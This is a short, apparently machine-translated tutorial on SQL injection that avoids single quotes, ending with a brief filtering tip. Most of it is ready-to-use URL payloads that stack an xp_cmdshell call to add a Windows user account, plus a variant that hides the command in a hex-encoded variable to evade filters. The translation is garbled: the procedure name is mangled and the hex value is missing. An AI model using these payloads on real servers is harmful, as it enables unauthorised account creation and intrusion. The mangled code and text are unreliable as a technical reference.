In SQL injection, the injection continues without the single quotation mark.

This is also an example of the "Implementation and Application of SQL injection" I wrote. Because no filtering is encountered, it makes it quite easy for us to inject data successfully, as shown below: CopyCode The Code is as follows: http://www.jb51.net/show.asp? Id = 1; Exec master. DBO. xp_mongoshell 'net user Angel Pass/add ';--

This often leads to misunderstandings. I think that as long as the variables are filtered, SQL injection attacks can be prevented.ProgramIt is not enough to simply filter out the root cause of injection. Let's take a look at the following statement when filtering out:Copy codeThe Code is as follows: http://www.jb51.net/show.asp? Id = 1; declare % 20 @ A % 20 sysname % 20 select % 20 @ A = running % 20 exec % 20master. DBO. xp_mongoshell % 20 @ ;--

Is there a big difference with the above sentence? However, the results are exactly the same. These are all SQL statements.Copy codeThe Code is as follows:

This is the hexadecimal format of "net user Angel Pass/Add. If you know SQL, you can easily understand it. Declare a variable a first, assign the value of our command to a, and then call variable A to execute the input command. Variable A can be any command. As follows:Copy codeThe Code is as follows: declare @ A sysname
Select @ A =
Exec master. DBO. xp_mongoshell @

Solution:
Filter variables. Only specific characters are allowed. For example, for numeric variables, only numeric data can be entered. Not to mention it. This is completely the freedom of the program author.